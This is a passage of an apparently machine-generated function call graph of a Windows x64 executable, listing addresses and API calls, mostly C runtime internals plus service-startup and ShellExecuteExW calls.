Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 19507->19508 19509 7ff76e1ac98c 19508->19509 19510 7ff76e1ac5d8 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 19509->19510 19511 7ff76e1ac99a 19510->19511 19512 7ff76e1ac5d8 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 19511->19512 19513 7ff76e1ac9a9 19512->19513 19514 7ff76e1a2448 __free_lconv_mon 6 API calls 19513->19514 19515 7ff76e1ac9b5 19514->19515 19516 7ff76e1a2448 __free_lconv_mon 6 API calls 19515->19516 19517 7ff76e1ac9c1 19516->19517 19518 7ff76e1a2448 __free_lconv_mon 6 API calls 19517->19518 19519 7ff76e1ac9cd 19518->19519 19520 7ff76e1ac5d8 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 19519->19520 19521 7ff76e1ac9db 19520->19521 19522 7ff76e1ac5d8 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 19521->19522 19523 7ff76e1ac9e9 19522->19523 19524 7ff76e1ac5d8 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 19523->19524 19525 7ff76e1ac9f7 19524->19525 19526 7ff76e1ac5d8 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 19525->19526 19527 7ff76e1aca05 19526->19527 19528 7ff76e1ac5d8 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 19527->19528 19529 7ff76e1aca14 19528->19529 19530 7ff76e1a2448 __free_lconv_mon 6 API calls 19529->19530 19531 7ff76e1aca20 19530->19531 19532 7ff76e1a2448 __free_lconv_mon 6 API calls 19531->19532 19533 7ff76e1aca2c 19532->19533 19534 7ff76e1a2448 __free_lconv_mon 6 API calls 19533->19534 19535 7ff76e1aca38 19534->19535 19536 7ff76e1a2448 __free_lconv_mon 6 API calls 19535->19536 19536->19503 19538 7ff76e1ac5ff 19537->19538 19540 7ff76e1ac5ee 19537->19540 19538->19506 19539 7ff76e1a2448 __free_lconv_mon 6 API calls 19539->19540 19540->19538 19540->19539 19542 7ff76e19c287 19541->19542 19549 7ff76e19c2f8 19542->19549 19544 7ff76e19c2ae 19546 7ff76e19c2d1 19544->19546 19557 7ff76e196190 19544->19557 19547 7ff76e19c2e6 19546->19547 19548 7ff76e196190 ProcessCodePage 28 API calls 19546->19548 19547->19363 19548->19547 19564 7ff76e19c040 19549->19564 19551 7ff76e19c322 _invalid_parameter_noinfo_noreturn 19553 7ff76e19c333 __crtLCMapStringW 19551->19553 19568 7ff76e19c414 IsProcessorFeaturePresent 19551->19568 19553->19544 19558 7ff76e1961e3 19557->19558 19559 7ff76e1961a3 __vcrt_getptd_noinit 19557->19559 19558->19546 19560 7ff76e1a2030 ProcessCodePage 11 API calls 19559->19560 19561 7ff76e1961ce __vcrt_getptd_noinit 19560->19561 19561->19558 19608 7ff76e19d230 19561->19608 19565 7ff76e19c087 __vcrt_getptd_noinit 19564->19565 19566 7ff76e19c05c __vcrt_getptd_noinit 19564->19566 19565->19551 19572 7ff76e1a2030 19566->19572 19569 7ff76e19c427 19568->19569 19589 7ff76e19c0f8 19569->19589 19573 7ff76e1a204f FlsGetValue 19572->19573 19574 7ff76e1a206a FlsSetValue 19572->19574 19575 7ff76e1a2064 19573->19575 19576 7ff76e1a205c 19573->19576 19574->19576 19577 7ff76e1a2077 19574->19577 19575->19574 19576->19565 19578 7ff76e1a23d0 _set_fmode 6 API calls 19577->19578 19579 7ff76e1a2086 19578->19579 19580 7ff76e1a20a4 FlsSetValue 19579->19580 19581 7ff76e1a2094 FlsSetValue 19579->19581 19583 7ff76e1a20b0 FlsSetValue 19580->19583 19584 7ff76e1a20c2 19580->19584 19582 7ff76e1a209d 19581->19582 19586 7ff76e1a2448 __free_lconv_mon 6 API calls 19582->19586 19583->19582 19585 7ff76e1a1b9c _set_fmode 6 API calls 19584->19585 19587 7ff76e1a20ca 19585->19587 19586->19576 19588 7ff76e1a2448 __free_lconv_mon 6 API calls 19587->19588 19588->19576 19590 7ff76e19c132 _fread_nolock BuildCatchObjectHelperInternal 19589->19590 19591 7ff76e19c15a RtlCaptureContext RtlLookupFunctionEntry 19590->19591 19592 7ff76e19c194 RtlVirtualUnwind 19591->19592 19593 7ff76e19c1ca IsDebuggerPresent 19591->19593 19592->19593 19594 7ff76e19c20d BuildCatchObjectHelperInternal 19593->19594 19597 7ff76e190580 19594->19597 19596 7ff76e19c23b GetCurrentProcess TerminateProcess 19598 7ff76e190589 19597->19598 19599 7ff76e190594 19598->19599 19600 7ff76e1905e0 IsProcessorFeaturePresent 19598->19600 19599->19596 19601 7ff76e1905f8 19600->19601 19604 7ff76e1907d8 RtlCaptureContext 19601->19604 19603 7ff76e19060b 19603->19596 19605 7ff76e1907f2 RtlLookupFunctionEntry 19604->19605 19606 7ff76e190841 19605->19606 19607 7ff76e190808 RtlVirtualUnwind 19605->19607 19606->19603 19607->19605 19607->19606 19609 7ff76e19d239 BuildCatchObjectHelperInternal 19608->19609 19610 7ff76e19d248 19609->19610 19616 7ff76e1a8ed8 19609->19616 19612 7ff76e19d251 IsProcessorFeaturePresent 19610->19612 19615 7ff76e19d27b BuildCatchObjectHelperInternal 19610->19615 19613 7ff76e19d260 19612->19613 19614 7ff76e19c0f8 BuildCatchObjectHelperInternal 8 API calls 19613->19614 19614->19615 19617 7ff76e1a8f08 19616->19617 19625 7ff76e1a8f2f 19616->19625 19618 7ff76e1a1f68 _set_fmode 6 API calls 19617->19618 19620 7ff76e1a8f1c 19617->19620 19617->19625 19618->19620 19619 7ff76e1a8f6c 19619->19610 19620->19619 19621 7ff76e1a8fb1 19620->19621 19620->19625 19622 7ff76e19d35c _set_fmode 6 API calls 19621->19622 19624 7ff76e1a8fb6 19622->19624 19623 7ff76e1a906b 19631 7ff76e1a1df0 28 API calls _Getctype 19623->19631 19627 7ff76e19c3c4 _invalid_parameter_noinfo 28 API calls 19624->19627 19625->19623 19626 7ff76e1a9138 BuildCatchObjectHelperInternal 19625->19626 19632 7ff76e1a1df0 19625->19632 19627->19619 19630 7ff76e1a1df0 _Getctype 28 API calls 19630->19623 19631->19623 19633 7ff76e1a1e05 __vcrt_getptd_noinit 19632->19633 19634 7ff76e1a1e31 FlsSetValue 19633->19634 19635 7ff76e1a1e14 FlsGetValue 19633->19635 19636 7ff76e1a1e21 __vcrt_getptd_noinit 19634->19636 19638 7ff76e1a1e43 19634->19638 19635->19636 19637 7ff76e1a1e2b 19635->19637 19646 7ff76e1a1eaa 19636->19646 19649 7ff76e19d230 BuildCatchObjectHelperInternal 23 API calls 19636->19649 19637->19634 19639 7ff76e1a23d0 _set_fmode 6 API calls 19638->19639 19640 7ff76e1a1e52 19639->19640 19641 7ff76e1a1e70 FlsSetValue 19640->19641 19642 7ff76e1a1e60 FlsSetValue 19640->19642 19644 7ff76e1a1e7c FlsSetValue 19641->19644 19645 7ff76e1a1e8e 19641->19645 19643 7ff76e1a1e69 19642->19643 19647 7ff76e1a2448 __free_lconv_mon 6 API calls 19643->19647 19644->19643 19648 7ff76e1a1b9c _set_fmode 6 API calls 19645->19648 19646->19630 19647->19636 19650 7ff76e1a1e96 19648->19650 19651 7ff76e1a1ec2 19649->19651 19652 7ff76e1a2448 __free_lconv_mon 6 API calls 19650->19652 19652->19636 19658 7ff76e1a2544 19653->19658 19655 7ff76e1a2a7a 19656 7ff76e1a2a99 InitializeCriticalSectionAndSpinCount 19655->19656 19657 7ff76e1a2a7f __crtLCMapStringW 19655->19657 19656->19657 19657->19388 19660 7ff76e1a25a1 __vcrt_InitializeCriticalSectionEx 19658->19660 19661 7ff76e1a259c __vcrt_getptd_noinit __vcrt_InitializeCriticalSectionEx 19658->19661 19659 7ff76e1a25d1 LoadLibraryExW 19659->19660 19659->19661 19660->19655 19661->19659 19661->19660 19662 7ff76e1a2630 LoadLibraryExW 19661->19662 19662->19660 19662->19661 20882 7ff76e18a520 20884 7ff76e18a531 20882->20884 20883 7ff76e18a574 20884->20883 20889 7ff76e19b678 20884->20889 20892 7ff76e19b6a6 20889->20892 20890 7ff76e19b6cb 20891 7ff76e19c2f8 _invalid_parameter_noinfo_noreturn 28 API calls 20890->20891 20895 7ff76e19b6f4 20891->20895 20892->20890 20893 7ff76e19b71e 20892->20893 20906 7ff76e19b550 20893->20906 20897 7ff76e19b788 20895->20897 20898 7ff76e196190 ProcessCodePage 28 API calls 20895->20898 20896 7ff76e18a552 20896->20883 20900 7ff76e18d000 20896->20900 20897->20896 20899 7ff76e196190 ProcessCodePage 28 API calls 20897->20899 20898->20897 20899->20896 20901 7ff76e18d07a 20900->20901 20905 7ff76e18d09a 20900->20905 20914 7ff76e19644c 20901->20914 20902 7ff76e190580 _log10_special 4 API calls 20904 7ff76e18a56b 20902->20904 20905->20902 20913 7ff76e196494 RtlEnterCriticalSection 20906->20913 20915 7ff76e196455 20914->20915 20919 7ff76e196465 20914->20919 20916 7ff76e19d35c _set_fmode 6 API calls 20915->20916 20917 7ff76e19645a 20916->20917 20918 7ff76e19c3c4 _invalid_parameter_noinfo 28 API calls 20917->20918 20918->20919 20919->20905 20920 7ff76e18cd20 20923 7ff76e18a3a0 20920->20923 20922 7ff76e18cd3b 20926 7ff76e18b0d0 20923->20926 20925 7ff76e18a3ec 20925->20922 20927 7ff76e18b0ed 20926->20927 20929 7ff76e18b12a 20927->20929 20930 7ff76e18d100 20927->20930 20929->20925 20931 7ff76e18d16a 20930->20931 20932 7ff76e18d11a 20930->20932 20931->20929 20936 7ff76e18cf00 20932->20936 20934 7ff76e18d154 20946 7ff76e1969c0 20934->20946 20937 7ff76e18cfe0 20936->20937 20938 7ff76e18cf23 20936->20938 20939 7ff76e190580 _log10_special 4 API calls 20937->20939 20938->20937 20940 7ff76e18cf2d 20938->20940 20941 7ff76e18cfef 20939->20941 20942 7ff76e18cf7f 20940->20942 20954 7ff76e19b460 20940->20954 20941->20934 20943 7ff76e190580 _log10_special 4 API calls 20942->20943 20944 7ff76e18cf9c 20943->20944 20944->20934 20947 7ff76e1969f0 20946->20947 20977 7ff76e19689c 20947->20977 20949 7ff76e196a09 20950 7ff76e196a2e 20949->20950 20951 7ff76e196190 ProcessCodePage 28 API calls 20949->20951 20952 7ff76e196a43 20950->20952 20953 7ff76e196190 ProcessCodePage 28 API calls 20950->20953 20951->20950 20952->20931 20953->20952 20955 7ff76e19b490 20954->20955 20962 7ff76e19b1b0 20955->20962 20958 7ff76e19b4d4 20960 7ff76e19b4e9 20958->20960 20961 7ff76e196190 ProcessCodePage 28 API calls 20958->20961 20959 7ff76e196190 ProcessCodePage 28 API calls 20959->20958 20960->20942 20961->20960 20963 7ff76e19b1d0 20962->20963 20964 7ff76e19b1fd 20962->20964 20963->20964 20965 7ff76e19b205 20963->20965 20966 7ff76e19b1da 20963->20966 20964->20958 20964->20959 20969 7ff76e19b0f0 20965->20969 20968 7ff76e19c2f8 _invalid_parameter_noinfo_noreturn 28 API calls 20966->20968 20968->20964 20976 7ff76e196494 RtlEnterCriticalSection 20969->20976 20978 7ff76e1968e5 20977->20978 20979 7ff76e1968b7 20977->20979 20986 7ff76e1968d7 20978->20986 20987 7ff76e196494 RtlEnterCriticalSection 20978->20987 20980 7ff76e19c2f8 _invalid_parameter_noinfo_noreturn 28 API calls 20979->20980 20980->20986 20986->20949 21338 7ff76e18a580 21339 7ff76e18a5b6 21338->21339 21346 7ff76e18a5d0 21338->21346 21340 7ff76e18cf00 46 API calls 21339->21340 21342 7ff76e18a5bb 21340->21342 21341 7ff76e190580 _log10_special 4 API calls 21343 7ff76e18a64a 21341->21343 21342->21346 21354 7ff76e19b93c 21342->21354 21345 7ff76e18cf00 46 API calls 21343->21345 21353 7ff76e18a6eb 21343->21353 21348 7ff76e18a6b6 21345->21348 21346->21341 21347 7ff76e190580 _log10_special 4 API calls 21349 7ff76e18a759 21347->21349 21350 7ff76e18a6d6 21348->21350 21348->21353 21361 7ff76e19bf0c 21348->21361 21350->21353 21369 7ff76e19b504 21350->21369 21353->21347 21355 7ff76e19b945 21354->21355 21356 7ff76e19d35c _set_fmode 6 API calls 21355->21356 21357 7ff76e19b962 21355->21357 21358 7ff76e19b94a 21356->21358 21359 7ff76e19c3c4 _invalid_parameter_noinfo 28 API calls 21358->21359 21360 7ff76e19b955 21359->21360 21360->21346 21362 7ff76e19bf3c 21361->21362 21378 7ff76e19bc9c 21362->21378 21365 7ff76e19bf7a 21367 7ff76e19bf8f 21365->21367 21368 7ff76e196190 ProcessCodePage 28 API calls 21365->21368 21366 7ff76e196190 ProcessCodePage 28 API calls 21366->21365 21367->21350 21368->21367 21370 7ff76e19b518 21369->21370 21371 7ff76e19b52d 21369->21371 21372 7ff76e19d35c _set_fmode 6 API calls 21370->21372 21371->21370 21373 7ff76e19b532 21371->21373 21374 7ff76e19b51d 21372->21374 21390 7ff76e1a69e4 21373->21390 21376 7ff76e19c3c4 _invalid_parameter_noinfo 28 API calls 21374->21376 21377 7ff76e19b528 21376->21377 21377->21353 21379 7ff76e19bd06 21378->21379 21380 7ff76e19bcc6 21378->21380 21379->21380 21381 7ff76e19bd12 21379->21381 21382 7ff76e19c2f8 _invalid_parameter_noinfo_noreturn 28 API calls 21380->21382 21389 7ff76e196494 RtlEnterCriticalSection 21381->21389 21383 7ff76e19bced 21382->21383 21383->21365 21383->21366 21391 7ff76e1a6a14 21390->21391 21398 7ff76e1a64f0 21391->21398 21394 7ff76e1a6a53 21396 7ff76e1a6a68 21394->21396 21397 7ff76e196190 ProcessCodePage 28 API calls 21394->21397 21395 7ff76e196190 ProcessCodePage 28 API calls 21395->21394 21396->21377 21397->21396 21399 7ff76e1a653a 21398->21399 21400 7ff76e1a650b 21398->21400 21408 7ff76e196494 RtlEnterCriticalSection 21399->21408 21401 7ff76e19c2f8 _invalid_parameter_noinfo_noreturn 28 API calls 21400->21401 21403 7ff76e1a652b 21401->21403 21403->21394 21403->21395 19663 7ff76e1908c0 19664 7ff76e1908d0 19663->19664 19678 7ff76e19ee34 19664->19678 19666 7ff76e1908dc 19684 7ff76e190bbc 19666->19684 19669 7ff76e1908f4 _RTC_Initialize 19676 7ff76e190949 19669->19676 19689 7ff76e190d6c 19669->19689 19670 7ff76e190975 19672 7ff76e190909 19692 7ff76e19e2a4 19672->19692 19674 7ff76e190915 19674->19676 19717 7ff76e19f54c 19674->19717 19677 7ff76e190965 19676->19677 19724 7ff76e1912e0 IsProcessorFeaturePresent 19676->19724 19679 7ff76e19ee45 19678->19679 19680 7ff76e19d35c _set_fmode 6 API calls 19679->19680 19681 7ff76e19ee4d 19679->19681 19682 7ff76e19ee5c 19680->19682 19681->19666 19683 7ff76e19c3c4 _invalid_parameter_noinfo 28 API calls 19682->19683 19683->19681 19685 7ff76e190bcd 19684->19685 19688 7ff76e190bd2 __scrt_release_startup_lock 19684->19688 19686 7ff76e1912e0 5 API calls 19685->19686 19685->19688 19687 7ff76e190c46 19686->19687 19688->19669 19731 7ff76e190d30 19689->19731 19691 7ff76e190d75 19691->19672 19693 7ff76e19e2c4 19692->19693 19694 7ff76e19e2db 19692->19694 19695 7ff76e19e2e2 GetModuleFileNameW 19693->19695 19696 7ff76e19e2cc 19693->19696 19694->19674 19700 7ff76e19e30d 19695->19700 19697 7ff76e19d35c _set_fmode 6 API calls 19696->19697 19698 7ff76e19e2d1 19697->19698 19699 7ff76e19c3c4 _invalid_parameter_noinfo 28 API calls 19698->19699 19699->19694 19776 7ff76e19e244 19700->19776 19703 7ff76e19e355 19704 7ff76e19d35c _set_fmode 6 API calls 19703->19704 19705 7ff76e19e35a 19704->19705 19708 7ff76e1a2448 __free_lconv_mon 6 API calls 19705->19708 19706 7ff76e19e38f 19710 7ff76e1a2448 __free_lconv_mon 6 API calls 19706->19710 19707 7ff76e19e36d 19707->19706 19711 7ff76e19e3d4 19707->19711 19712 7ff76e19e3bb 19707->19712 19709 7ff76e19e368 19708->19709 19709->19694 19710->19694 19714 7ff76e1a2448 __free_lconv_mon 6 API calls 19711->19714 19713 7ff76e1a2448 __free_lconv_mon 6 API calls 19712->19713 19715 7ff76e19e3c4 19713->19715 19714->19706 19716 7ff76e1a2448 __free_lconv_mon 6 API calls 19715->19716 19716->19709 19718 7ff76e1a1df0 _Getctype 28 API calls 19717->19718 19719 7ff76e19f559 19718->19719 19720 7ff76e19f58d 19719->19720 19721 7ff76e19d35c _set_fmode 6 API calls 19719->19721 19720->19676 19722 7ff76e19f582 19721->19722 19723 7ff76e19c3c4 _invalid_parameter_noinfo 28 API calls 19722->19723 19723->19720 19725 7ff76e191306 _fread_nolock BuildCatchObjectHelperInternal 19724->19725 19726 7ff76e191325 RtlCaptureContext RtlLookupFunctionEntry 19725->19726 19727 7ff76e19138a _fread_nolock 19726->19727 19728 7ff76e19134e RtlVirtualUnwind 19726->19728 19729 7ff76e1913bc IsDebuggerPresent 19727->19729 19728->19727 19730 7ff76e1913fb BuildCatchObjectHelperInternal 19729->19730 19730->19670 19732 7ff76e190d4a 19731->19732 19734 7ff76e190d43 shared_ptr 19731->19734 19735 7ff76e1a0c8c 19732->19735 19734->19691 19738 7ff76e1a08c8 19735->19738 19737 7ff76e1a0cce 19737->19734 19739 7ff76e1a08e4 19738->19739 19742 7ff76e1a0940 19739->19742 19741 7ff76e1a08ed 19741->19737 19743 7ff76e1a096c 19742->19743 19751 7ff76e1a0a01 19742->19751 19744 7ff76e1a09dd 19743->19744 19743->19751 19752 7ff76e1ae4fc 19743->19752 19746 7ff76e1ae4fc shared_ptr 8 API calls 19744->19746 19744->19751 19748 7ff76e1a09f7 19746->19748 19747 7ff76e1a09d3 19749 7ff76e1a2448 __free_lconv_mon 6 API calls 19747->19749 19750 7ff76e1a2448 __free_lconv_mon 6 API calls 19748->19750 19749->19744 19750->19751 19751->19741 19753 7ff76e1ae51e 19752->19753 19757 7ff76e1ae53b 19752->19757 19754 7ff76e1ae52c 19753->19754 19753->19757 19755 7ff76e19d35c _set_fmode 6 API calls 19754->19755 19756 7ff76e1ae531 _fread_nolock 19755->19756 19756->19747 19759 7ff76e1a9584 19757->19759 19760 7ff76e1a95a3 19759->19760 19761 7ff76e1a9599 19759->19761 19763 7ff76e1a95a8 19760->19763 19769 7ff76e1a95af _set_fmode std::_Facet_Register 19760->19769 19770 7ff76e1a4340 19761->19770 19764 7ff76e1a2448 __free_lconv_mon 6 API calls 19763->19764 19767 7ff76e1a95a1 19764->19767 19765 7ff76e1a95e2 RtlReAllocateHeap 19765->19767 19765->19769 19766 7ff76e1a95b5 19768 7ff76e19d35c _set_fmode 6 API calls 19766->19768 19767->19756 19768->19767 19769->19765 19769->19766 19771 7ff76e1a438b 19770->19771 19775 7ff76e1a434f _set_fmode std::_Facet_Register 19770->19775 19772 7ff76e19d35c _set_fmode 6 API calls 19771->19772 19774 7ff76e1a4389 19772->19774 19773 7ff76e1a4372 RtlAllocateHeap 19773->19774 19773->19775 19774->19767 19775->19771 19775->19773 19777 7ff76e19e25c 19776->19777 19778 7ff76e19e294 19776->19778 19777->19778 19779 7ff76e1a23d0 _set_fmode 6 API calls 19777->19779 19778->19703 19778->19707 19780 7ff76e19e28a 19779->19780 19781 7ff76e1a2448 __free_lconv_mon 6 API calls 19780->19781 19781->19778 23269 7ff76e18a8c0 23270 7ff76e18a8d8 23269->23270 23278 7ff76e18a8e4 ctype 23269->23278 23271 7ff76e18aa4d 23272 7ff76e18a8f9 ctype 23271->23272 23274 7ff76e19bbd4 _fread_nolock 36 API calls 23271->23274 23276 7ff76e18ab5f 23272->23276 23277 7ff76e18ab44 23272->23277 23282 7ff76e18aad9 23272->23282 23274->23272 23275 7ff76e190580 _log10_special 4 API calls 23279 7ff76e18acea 23275->23279 23281 7ff76e196a9c 37 API calls 23276->23281 23297 7ff76e196a9c 23277->23297 23278->23271 23278->23272 23294 7ff76e19bbd4 23278->23294 23287 7ff76e18ab7f ctype 23281->23287 23282->23275 23283 7ff76e18ac9c 23283->23282 23285 7ff76e18ad67 23283->23285 23284 7ff76e18e040 30 API calls 23284->23287 23286 7ff76e19c3e4 _invalid_parameter_noinfo_noreturn 28 API calls 23285->23286 23291 7ff76e18ad6c 23286->23291 23287->23283 23287->23284 23288 7ff76e196a9c 37 API calls 23287->23288 23290 7ff76e18ad1b 23287->23290 23288->23287 23290->23283 23318 7ff76e19b8e4 23290->23318 23292 7ff76e18ad94 23291->23292 23293 7ff76e19b8e4 30 API calls 23291->23293 23293->23292 23330 7ff76e19bbf4 23294->23330 23298 7ff76e196ad6 23297->23298 23299 7ff76e196ab8 23297->23299 23344 7ff76e196494 RtlEnterCriticalSection 23298->23344 23300 7ff76e19d35c _set_fmode 6 API calls 23299->23300 23303 7ff76e196abd 23300->23303 23304 7ff76e19c3c4 _invalid_parameter_noinfo 28 API calls 23303->23304 23315 7ff76e196ac8 23304->23315 23315->23282 23319 7ff76e19b91b 23318->23319 23320 7ff76e19b8fd 23318->23320 23345 7ff76e196494 RtlEnterCriticalSection 23319->23345 23322 7ff76e19d35c _set_fmode 6 API calls 23320->23322 23324 7ff76e19b902 23322->23324 23326 7ff76e19c3c4 _invalid_parameter_noinfo 28 API calls 23324->23326 23328 7ff76e19b90d 23326->23328 23328->23290 23331 7ff76e19bc1e 23330->23331 23332 7ff76e19bbec 23330->23332 23331->23332 23333 7ff76e19bc6a 23331->23333 23334 7ff76e19bc2d _fread_nolock 23331->23334 23332->23278 23343 7ff76e196494 RtlEnterCriticalSection 23333->23343 23337 7ff76e19d35c _set_fmode 6 API calls 23334->23337 23339 7ff76e19bc42 23337->23339 23341 7ff76e19c3c4 _invalid_parameter_noinfo 28 API calls 23339->23341 23341->23332 23354 7ff76e18a4d0 23355 7ff76e18a516 23354->23355 23356 7ff76e18a4e3 23354->23356 23356->23355 23359 7ff76e196834 23356->23359 23360 7ff76e196842 23359->23360 23361 7ff76e196849 23359->23361 23365 7ff76e19666c 23360->23365 23363 7ff76e18a506 23361->23363 23368 7ff76e19662c 23361->23368 23375 7ff76e196548 23365->23375 23367 7ff76e1966b8 23367->23363 23387 7ff76e196494 RtlEnterCriticalSection 23368->23387 23377 7ff76e196567 23375->23377 23376 7ff76e196611 23376->23367 23377->23376 23379 7ff76e1964ac 23377->23379 23386 7ff76e196494 RtlEnterCriticalSection 23379->23386 19782 7ff76e1909ac 19806 7ff76e190b80 19782->19806 19785 7ff76e190b03 19787 7ff76e1912e0 5 API calls 19785->19787 19786 7ff76e1909cd __scrt_acquire_startup_lock 19788 7ff76e190b0d 19786->19788 19796 7ff76e1909eb __scrt_release_startup_lock 19786->19796 19787->19788 19789 7ff76e1912e0 5 API calls 19788->19789 19791 7ff76e190b18 BuildCatchObjectHelperInternal 19789->19791 19790 7ff76e190a10 19872 7ff76e1911d4 19791->19872 19794 7ff76e190a96 19812 7ff76e19ea0c 19794->19812 19796->19790 19796->19794 19861 7ff76e19edb8 19796->19861 19798 7ff76e190a9b 19818 7ff76e182090 19798->19818 19803 7ff76e190ac3 19868 7ff76e190d04 19803->19868 19807 7ff76e190b88 19806->19807 19808 7ff76e190b94 __scrt_dllmain_crt_thread_attach 19807->19808 19809 7ff76e190ba1 19808->19809 19811 7ff76e1909c5 19808->19811 19809->19811 19875 7ff76e1927a0 19809->19875 19811->19785 19811->19786 19813 7ff76e19ea1c 19812->19813 19817 7ff76e19ea31 19812->19817 19813->19817 19883 7ff76e19e49c 19813->19883 19817->19798 19945 7ff76e18ca60 19818->19945 19820 7ff76e18220d 19821 7ff76e18ca60 30 API calls 19820->19821 19822 7ff76e18227d 19821->19822 19823 7ff76e18ca60 30 API calls 19822->19823 19824 7ff76e1826af GetCurrentProcessId 19823->19824 19825 7ff76e1826c0 19824->19825 19826 7ff76e18ca60 30 API calls 19825->19826 19827 7ff76e182804 19826->19827 19829 7ff76e182842 ctype 19827->19829 20020 7ff76e18e340 19827->20020 19830 7ff76e1828a5 ShellExecuteExW 19829->19830 19831 7ff76e182a10 19830->19831 19831->19831 19832 7ff76e18ca60 30 API calls 19831->19832 19833 7ff76e182a42 lstrcmpiW 19832->19833 19834 7ff76e182a6c 19833->19834 19835 7ff76e182c91 StartServiceCtrlDispatcherW 19833->19835 19959 7ff76e1831e0 GetModuleFileNameW 19834->19959 19837 7ff76e182cd0 19835->19837 19844 7ff76e182a71 19835->19844 19839 7ff76e18ca60 30 API calls 19837->19839 19838 7ff76e1831be 19840 7ff76e19c3e4 _invalid_parameter_noinfo_noreturn 28 API calls 19838->19840 19842 7ff76e182f61 19839->19842 19841 7ff76e1831c4 19840->19841 19845 7ff76e19c3e4 _invalid_parameter_noinfo_noreturn 28 API calls 19841->19845 20026 7ff76e183d40 RegisterEventSourceW 19842->20026 19844->19838 19844->19841 19846 7ff76e1831ca 19844->19846 19849 7ff76e1831d0 19844->19849 19850 7ff76e182c00 19844->19850 19853 7ff76e1831ad 19844->19853 19858 7ff76e1831b8 19844->19858 19845->19846 19848 7ff76e19c3e4 _invalid_parameter_noinfo_noreturn 28 API calls 19846->19848 19847 7ff76e182c55 19851 7ff76e190580 _log10_special 4 API calls 19847->19851 19848->19849 19852 7ff76e19c3e4 _invalid_parameter_noinfo_noreturn 28 API calls 19849->19852 19850->19847 19854 7ff76e1831b2 19850->19854 19856 7ff76e182c6b 19851->19856 19857 7ff76e1831d6 19852->19857 20033 7ff76e19c3e4 19853->20033 19859 7ff76e19c3e4 _invalid_parameter_noinfo_noreturn 28 API calls 19854->19859 19866 7ff76e191430 GetModuleHandleW 19856->19866 19860 7ff76e19c3e4 _invalid_parameter_noinfo_noreturn 28 API calls 19858->19860 19859->19858 19860->19838 19862 7ff76e19edf0 19861->19862 19863 7ff76e19edcf 19861->19863 20551 7ff76e1a0e78 19862->20551 19863->19794 19867 7ff76e190abf 19866->19867 19867->19791 19867->19803 19869 7ff76e190d15 19868->19869 19870 7ff76e190ad6 19869->19870 19871 7ff76e1927a0 RtlDeleteCriticalSection 19869->19871 19870->19790 19871->19870 19873 7ff76e1911f7 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 19872->19873 19874 7ff76e190b39 19872->19874 19873->19874 19876 7ff76e1927b2 19875->19876 19877 7ff76e1927a8 __vcrt_uninitialize_ptd 19875->19877 19876->19811 19879 7ff76e195be4 19877->19879 19880 7ff76e195c0f 19879->19880 19881 7ff76e195bf2 RtlDeleteCriticalSection 19880->19881 19882 7ff76e195c13 19880->19882 19881->19880 19884 7ff76e19e4b5 19883->19884 19891 7ff76e19e4b1 19883->19891 19904 7ff76e1aad5c GetEnvironmentStringsW 19884->19904 19887 7ff76e19e4c2 19889 7ff76e1a2448 __free_lconv_mon 6 API calls 19887->19889 19888 7ff76e19e4ce 19911 7ff76e19e61c 19888->19911 19889->19891 19891->19817 19896 7ff76e19e85c 19891->19896 19893 7ff76e1a2448 __free_lconv_mon 6 API calls 19894 7ff76e19e4f5 19893->19894 19895 7ff76e1a2448 __free_lconv_mon 6 API calls 19894->19895 19895->19891 19897 7ff76e19e87f 19896->19897 19902 7ff76e19e896 19896->19902 19897->19817 19898 7ff76e1a9680 MultiByteToWideChar _fread_nolock 19898->19902 19899 7ff76e1a23d0 _set_fmode 6 API calls 19899->19902 19900 7ff76e19e90a 19901 7ff76e1a2448 __free_lconv_mon 6 API calls 19900->19901 19901->19897 19902->19897 19902->19898 19902->19899 19902->19900 19903 7ff76e1a2448 __free_lconv_mon 6 API calls 19902->19903 19903->19902 19905 7ff76e1aad80 19904->19905 19906 7ff76e19e4ba 19904->19906 19907 7ff76e1a4340 _fread_nolock 7 API calls 19905->19907 19906->19887 19906->19888 19909 7ff76e1aadb7 ctype 19907->19909 19908 7ff76e1a2448 __free_lconv_mon 6 API calls 19910 7ff76e1aadd7 FreeEnvironmentStringsW 19908->19910 19909->19908 19910->19906 19912 7ff76e19e644 19911->19912 19913 7ff76e1a23d0 _set_fmode 6 API calls 19912->19913 19925 7ff76e19e67f 19913->19925 19914 7ff76e19e687 19915 7ff76e1a2448 __free_lconv_mon 6 API calls 19914->19915 19916 7ff76e19e4d6 19915->19916 19916->19893 19917 7ff76e19e701 19918 7ff76e1a2448 __free_lconv_mon 6 API calls 19917->19918 19918->19916 19919 7ff76e1a23d0 _set_fmode 6 API calls 19919->19925 19920 7ff76e19e6f0 19939 7ff76e19e738 19920->19939 19924 7ff76e19e724 19928 7ff76e19c414 _invalid_parameter_noinfo_noreturn 11 API calls 19924->19928 19925->19914 19925->19917 19925->19919 19925->19920 19925->19924 19927 7ff76e1a2448 __free_lconv_mon 6 API calls 19925->19927 19930 7ff76e1a8dd8 19925->19930 19926 7ff76e1a2448 __free_lconv_mon 6 API calls 19926->19914 19927->19925 19929 7ff76e19e736 19928->19929 19931 7ff76e1a8def 19930->19931 19932 7ff76e1a8de5 19930->19932 19933 7ff76e19d35c _set_fmode 6 API calls 19931->19933 19932->19931 19937 7ff76e1a8e0b 19932->19937 19934 7ff76e1a8df7 19933->19934 19935 7ff76e19c3c4 _invalid_parameter_noinfo 28 API calls 19934->19935 19936 7ff76e1a8e03 19935->19936 19936->19925 19937->19936 19938 7ff76e19d35c _set_fmode 6 API calls 19937->19938 19938->19934 19943 7ff76e19e6f8 19939->19943 19944 7ff76e19e73d 19939->19944 19940 7ff76e19e766 19941 7ff76e1a2448 __free_lconv_mon 6 API calls 19940->19941 19941->19943 19942 7ff76e1a2448 __free_lconv_mon 6 API calls 19942->19944 19943->19926 19944->19940 19944->19942 19948 7ff76e18ca90 19945->19948 19946 7ff76e18cb98 20051 7ff76e181580 19946->20051 19948->19946 19950 7ff76e18cb92 19948->19950 19951 7ff76e18cb50 19948->19951 19952 7ff76e18cafc 19948->19952 19954 7ff76e18cab8 ctype 19948->19954 20045 7ff76e1814e0 19950->20045 19955 7ff76e19084c 